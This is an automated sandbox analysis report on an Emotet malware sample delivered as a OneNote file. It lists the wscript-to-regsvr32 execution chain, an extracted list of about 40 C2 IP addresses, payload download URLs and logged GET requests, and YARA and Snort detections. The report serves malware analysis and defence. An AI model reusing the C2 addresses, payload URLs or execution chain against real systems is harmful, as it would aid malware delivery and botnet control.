Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
malware.one

Overview

General Information

Sample Name:malware.one
(renamed file extension from malware to one, renamed because original name is a hash value)
Original Sample Name:malware.malware
Analysis ID:830538
MD5:80a381f900f302d1be5673f54f76321c
SHA1:1acac99bb1343a9dfd0100042e58e5f4e3a16f61
SHA256:59ecfd5be8b5d602353660723377ea0b2d517f621b350ce25a9b6f1f1386fd15
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 1760 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\malware.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 5836 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 5188 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 4420 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JMgyzwrCUAZpIA\OfEg.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • ONENOTEM.EXE (PID: 848 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • ONENOTEM.EXE (PID: 6140 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["138.197.14.67:8080", "193.194.92.175:443", "93.84.115.205:7080", "115.178.55.22:80", "218.38.121.17:443", "186.250.48.5:443", "174.138.33.49:7080", "83.229.80.93:8080", "175.126.176.79:8080", "209.239.112.82:8080", "37.59.103.148:8080", "185.148.169.10:8080", "82.98.180.154:7080", "103.224.241.74:8080", "103.41.204.169:8080", "202.28.34.99:8080", "198.199.70.22:8080", "62.171.178.147:8080", "37.44.244.177:8080", "195.77.239.39:8080", "159.65.135.222:7080", "139.196.72.155:8080", "46.101.98.60:8080", "85.214.67.203:8080", "54.37.228.122:443", "93.104.209.107:8080", "178.62.112.199:8080", "103.85.95.4:8080", "139.59.80.108:8080", "64.227.55.231:8080", "160.16.143.191:8080", "87.106.97.83:7080", "128.199.217.206:443", "178.238.225.252:8080", "128.199.242.164:8080", "85.25.120.45:8080", "103.254.12.236:7080", "114.79.130.68:443", "104.244.79.94:443", "78.47.204.80:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0XqmO8QAUAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWu6mj8QANAJA="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
malware.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\malware.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
        0000000F.00000002.573776336.0000000002030000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000003.386000568.0000000005771000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
          • 0x73fe:$asp_gen_obf1: "+"
          • 0x742e:$asp_gen_obf1: "+"
          • 0x10ff2:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
          • 0x11112:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
          • 0x7720:$jsp4: public
          • 0x7a6c:$jsp4: public
          • 0x7212:$asp_input1: request
          • 0x7cee:$asp_input1: request
          • 0x7d30:$asp_input1: request
          • 0x7e46:$asp_input1: request
          • 0x754c:$asp_payload11: wscript.shell
          • 0x7134:$asp_multi_payload_one1: createobject
          • 0x7222:$asp_multi_payload_one1: createobject
          • 0x729a:$asp_multi_payload_one1: createobject
          • 0x72f4:$asp_multi_payload_one1: createobject
          • 0x7530:$asp_multi_payload_one1: createobject
          • 0x7f44:$asp_multi_payload_one1: createobject
          • 0x7134:$asp_multi_payload_four1: createobject
          • 0x7222:$asp_multi_payload_four1: createobject
          • 0x729a:$asp_multi_payload_four1: createobject
          • 0x72f4:$asp_multi_payload_four1: createobject
          0000000A.00000003.393189517.0000000005915000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
          • 0x30d2:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
          • 0xb38:$jsp4: public
          • 0xe84:$jsp4: public
          • 0x159a:$jsp4: public
          • 0x1e80:$jsp4: public
          • 0x21cc:$jsp4: public
          • 0x28e2:$jsp4: public
          • 0x964:$asp_payload11: wscript.shell
          • 0x1cac:$asp_payload11: wscript.shell
          • 0x54c:$asp_multi_payload_one1: createobject
          • 0x63a:$asp_multi_payload_one1: createobject
          • 0x6b2:$asp_multi_payload_one1: createobject
          • 0x70c:$asp_multi_payload_one1: createobject
          • 0x948:$asp_multi_payload_one1: createobject
          • 0x135c:$asp_multi_payload_one1: createobject
          • 0x1698:$asp_multi_payload_one1: createobject
          • 0x1894:$asp_multi_payload_one1: createobject
          • 0x1982:$asp_multi_payload_one1: createobject
          • 0x19fa:$asp_multi_payload_one1: createobject
          • 0x1a54:$asp_multi_payload_one1: createobject
          • 0x1c90:$asp_multi_payload_one1: createobject
          0000000A.00000003.393189517.0000000005915000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
          • 0x816:$asp_gen_obf1: "+"
          • 0x846:$asp_gen_obf1: "+"
          • 0x1b5e:$asp_gen_obf1: "+"
          • 0x1b8e:$asp_gen_obf1: "+"
          • 0x30d2:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
          • 0xb38:$jsp4: public
          • 0xe84:$jsp4: public
          • 0x159a:$jsp4: public
          • 0x1e80:$jsp4: public
          • 0x21cc:$jsp4: public
          • 0x28e2:$jsp4: public
          • 0x62a:$asp_input1: request
          • 0x1106:$asp_input1: request
          • 0x1148:$asp_input1: request
          • 0x125e:$asp_input1: request
          • 0x1972:$asp_input1: request
          • 0x244e:$asp_input1: request
          • 0x2490:$asp_input1: request
          • 0x25a6:$asp_input1: request
          • 0x964:$asp_payload11: wscript.shell
          • 0x1cac:$asp_payload11: wscript.shell
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          15.2.regsvr32.exe.2030000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            15.2.regsvr32.exe.2030000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              14.2.regsvr32.exe.e00000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                14.2.regsvr32.exe.e00000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                  Sigma Signatures

                  Malware Analysis System Evasion

                  barindex
                  Sigma detected: Run temp file via regsvr32
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5836, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll, ProcessId: 5188, ProcessName: regsvr32.exe

                  Snort Signatures

                  Timestamp:192.168.2.38.8.8.857840532014169 03/20/23-13:33:35.045170
                  SID:2014169
                  Source Port:57840
                  Destination Port:53
                  Protocol:UDP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.3138.197.14.674970580802404306 03/20/23-13:34:39.278063
                  SID:2404306
                  Source Port:49705
                  Destination Port:8080
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.393.84.115.2054970870802404346 03/20/23-13:35:12.925218
                  SID:2404346
                  Source Port:49708
                  Destination Port:7080
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3115.178.55.2249709802404304 03/20/23-13:35:29.032640
                  SID:2404304
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3218.38.121.17497104432404322 03/20/23-13:35:36.187246
                  SID:2404322
                  Source Port:49710
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: malware.oneReversingLabs: Detection: 28%
                  Antivirus detection for URL or domain
                  Source: https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/rwAvira URL Cloud: Label: malware
                  Source: https://218.38.121.17/tcbvserkm/kigv/rbwmds/Avira URL Cloud: Label: malware
                  Source: https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/0Avira URL Cloud: Label: malware
                  Source: https://218.38.121.17:443/tcbvserkm/kigv/rbwmds/Avira URL Cloud: Label: malware
                  Source: https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/Avira URL Cloud: Label: malware
                  Source: https://218.38.121.17/tcbvserkm/kigv/rbwmds/T(Avira URL Cloud: Label: malware
                  Source: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/6Avira URL Cloud: Label: malware
                  Source: https://218.38.121.17/tcbvserkm/kigv/rbwmds/wnAvira URL Cloud: Label: malware
                  Source: https://thailandcan.org/assets/ulRa/PAvira URL Cloud: Label: malware
                  Source: https://4fly.su:443/search/OfGA/wMAvira URL Cloud: Label: malware
                  Source: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/vMAvira URL Cloud: Label: malware
                  Source: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/Avira URL Cloud: Label: malware
                  Source: http://semedacara.com.br/ava/ahhz/Avira URL Cloud: Label: malware
                  Source: http://staging-demo.com/public_html/wTG/Avira URL Cloud: Label: malware
                  Source: http://malli.su:80/img/PXN5J/Avira URL Cloud: Label: malware
                  Source: https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/Avira URL Cloud: Label: malware
                  Source: https://93.84.115.205:7080/TAvira URL Cloud: Label: malware
                  Source: https://olgaperezporro.com/Avira URL Cloud: Label: malware
                  Source: https://115.178.55.22:80/lAvira URL Cloud: Label: malware
                  Source: http://uk-eurodom.com/bitrix/9HrzPY66D1F/Avira URL Cloud: Label: malware
                  Source: https://olgaperezporro.comAvira URL Cloud: Label: malware
                  Source: https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/esquAvira URL Cloud: Label: malware
                  Source: https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/aAvira URL Cloud: Label: malware
                  Source: https://4fly.su:443/search/OfGA/Avira URL Cloud: Label: malware
                  Source: http://staging-demo.com/public_html/wTG/xMAvira URL Cloud: Label: phishing
                  Source: http://semedacara.com.br/ava/ahhz/yMAvira URL Cloud: Label: malware
                  Source: https://kts.group/35ccbf2003/jKgk8/uMAvira URL Cloud: Label: malware
                  Source: http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/Avira URL Cloud: Label: malware
                  Source: http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/8Avira URL Cloud: Label: malware
                  Source: https://4fly.su:443/search/OfGA/ataAvira URL Cloud: Label: malware
                  Source: https://kts.groupAvira URL Cloud: Label: malware
                  Source: http://staging-demo.com/public_html/wTAvira URL Cloud: Label: phishing
                  Source: http://uk-eurodom.com/bitrix/9HrzPY66D1F/24QAvira URL Cloud: Label: malware
                  Source: https://kts.group/35ccbf2003/jKgk8/Avira URL Cloud: Label: malware
                  Source: https://thailandcan.org/assets/ulRa/Avira URL Cloud: Label: malware
                  Source: http://malli.su:80/img/PXN5J/tMAvira URL Cloud: Label: malware
                  Source: http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/EC24%Avira URL Cloud: Label: malware
                  Source: https://138.197.14.67:8080/Avira URL Cloud: Label: malware
                  Source: http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/Avira URL Cloud: Label: malware
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dllReversingLabs: Detection: 79%
                  Source: C:\Windows\System32\JMgyzwrCUAZpIA\OfEg.dll (copy)ReversingLabs: Detection: 79%
                  Source: 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["138.197.14.67:8080", "193.194.92.175:443", "93.84.115.205:7080", "115.178.55.22:80", "218.38.121.17:443", "186.250.48.5:443", "174.138.33.49:7080", "83.229.80.93:8080", "175.126.176.79:8080", "209.239.112.82:8080", "37.59.103.148:8080", "185.148.169.10:8080", "82.98.180.154:7080", "103.224.241.74:8080", "103.41.204.169:8080", "202.28.34.99:8080", "198.199.70.22:8080", "62.171.178.147:8080", "37.44.244.177:8080", "195.77.239.39:8080", "159.65.135.222:7080", "139.196.72.155:8080", "46.101.98.60:8080", "85.214.67.203:8080", "54.37.228.122:443", "93.104.209.107:8080", "178.62.112.199:8080", "103.85.95.4:8080", "139.59.80.108:8080", "64.227.55.231:8080", "160.16.143.191:8080", "87.106.97.83:7080", "128.199.217.206:443", "178.238.225.252:8080", "128.199.242.164:8080", "85.25.120.45:8080", "103.254.12.236:7080", "114.79.130.68:443", "104.244.79.94:443", "78.47.204.80:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0XqmO8QAUAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWu6mj8QANAJA="]}
                  Source: unknownHTTPS traffic detected: 31.31.196.93:443 -> 192.168.2.3:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.115.116.248:443 -> 192.168.2.3:49703 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.3:49710 version: TLS 1.2
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002ED44 memset,FindFirstFileExA,14_2_000000018002ED44
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002F114 memset,FindFirstFileExW,FindClose,FindNextFileW,14_2_000000018002F114
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002F2C4 FindFirstFileExA,14_2_000000018002F2C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002F2F0 FindFirstFileExW,14_2_000000018002F2F0

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 193.194.92.175 443Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.84.115.205 7080Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 195.2.88.86 80Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 31.31.196.93 443Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeDomain query: olgaperezporro.com
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 40.115.116.248 443Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeDomain query: malli.su
                  Source: C:\Windows\SysWOW64\wscript.exeDomain query: kts.group
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 138.197.14.67 8080Jump to behavior
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.3:57840 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.3:49705 -> 138.197.14.67:8080
                  Source: TrafficSnort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.3:49708 -> 93.84.115.205:7080
                  Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49709 -> 115.178.55.22:80
                  Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.3:49710 -> 218.38.121.17:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 138.197.14.67:8080
                  Source: Malware configuration extractorIPs: 193.194.92.175:443
                  Source: Malware configuration extractorIPs: 93.84.115.205:7080
                  Source: Malware configuration extractorIPs: 115.178.55.22:80
                  Source: Malware configuration extractorIPs: 218.38.121.17:443
                  Source: Malware configuration extractorIPs: 186.250.48.5:443
                  Source: Malware configuration extractorIPs: 174.138.33.49:7080
                  Source: Malware configuration extractorIPs: 83.229.80.93:8080
                  Source: Malware configuration extractorIPs: 175.126.176.79:8080
                  Source: Malware configuration extractorIPs: 209.239.112.82:8080
                  Source: Malware configuration extractorIPs: 37.59.103.148:8080
                  Source: Malware configuration extractorIPs: 185.148.169.10:8080
                  Source: Malware configuration extractorIPs: 82.98.180.154:7080
                  Source: Malware configuration extractorIPs: 103.224.241.74:8080
                  Source: Malware configuration extractorIPs: 103.41.204.169:8080
                  Source: Malware configuration extractorIPs: 202.28.34.99:8080
                  Source: Malware configuration extractorIPs: 198.199.70.22:8080
                  Source: Malware configuration extractorIPs: 62.171.178.147:8080
                  Source: Malware configuration extractorIPs: 37.44.244.177:8080
                  Source: Malware configuration extractorIPs: 195.77.239.39:8080
                  Source: Malware configuration extractorIPs: 159.65.135.222:7080
                  Source: Malware configuration extractorIPs: 139.196.72.155:8080
                  Source: Malware configuration extractorIPs: 46.101.98.60:8080
                  Source: Malware configuration extractorIPs: 85.214.67.203:8080
                  Source: Malware configuration extractorIPs: 54.37.228.122:443
                  Source: Malware configuration extractorIPs: 93.104.209.107:8080
                  Source: Malware configuration extractorIPs: 178.62.112.199:8080
                  Source: Malware configuration extractorIPs: 103.85.95.4:8080
                  Source: Malware configuration extractorIPs: 139.59.80.108:8080
                  Source: Malware configuration extractorIPs: 64.227.55.231:8080
                  Source: Malware configuration extractorIPs: 160.16.143.191:8080
                  Source: Malware configuration extractorIPs: 87.106.97.83:7080
                  Source: Malware configuration extractorIPs: 128.199.217.206:443
                  Source: Malware configuration extractorIPs: 178.238.225.252:8080
                  Source: Malware configuration extractorIPs: 128.199.242.164:8080
                  Source: Malware configuration extractorIPs: 85.25.120.45:8080
                  Source: Malware configuration extractorIPs: 103.254.12.236:7080
                  Source: Malware configuration extractorIPs: 114.79.130.68:443
                  Source: Malware configuration extractorIPs: 104.244.79.94:443
                  Source: Malware configuration extractorIPs: 78.47.204.80:443
                  Source: Joe Sandbox ViewASN Name: ARNDZ ARNDZ
                  Source: Joe Sandbox ViewASN Name: BELPAK-ASBELPAKBY BELPAK-ASBELPAKBY
                  Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                  Source: Joe Sandbox ViewIP Address: 193.194.92.175 193.194.92.175
                  Source: Joe Sandbox ViewIP Address: 93.84.115.205 93.84.115.205
                  Source: Joe Sandbox ViewIP Address: 174.138.33.49 174.138.33.49
                  Source: global trafficHTTP traffic detected: GET /35ccbf2003/jKgk8/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: kts.group
                  Source: global trafficHTTP traffic detected: GET /js/ExGBiCZdkkw0GBAuHNZ/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: olgaperezporro.com
                  Source: global trafficTCP traffic: 192.168.2.3:49705 -> 138.197.14.67:8080
                  Source: global trafficTCP traffic: 192.168.2.3:49708 -> 93.84.115.205:7080
                  Source: unknownNetwork traffic detected: IP country count 19
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.197.14.67
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.194.92.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.194.92.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.194.92.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.194.92.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 93.84.115.205
                  Source: unknownTCP traffic detected without corresponding DNS query: 93.84.115.205
                  Source: unknownTCP traffic detected without corresponding DNS query: 93.84.115.205
                  Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 115.178.55.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                  Source: wscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389268464.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394733751.00000000058D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1it.fit
                  Source: wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394765226.0000000005917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381734544.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/
                  Source: wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381439650.000000000557E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.000000000558C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394341142.000000000558C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/EC24%
                  Source: wscript.exe, 0000000A.00000003.393736917.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393578356.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.375930591.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.395019547.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000003.453274257.0000000002888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
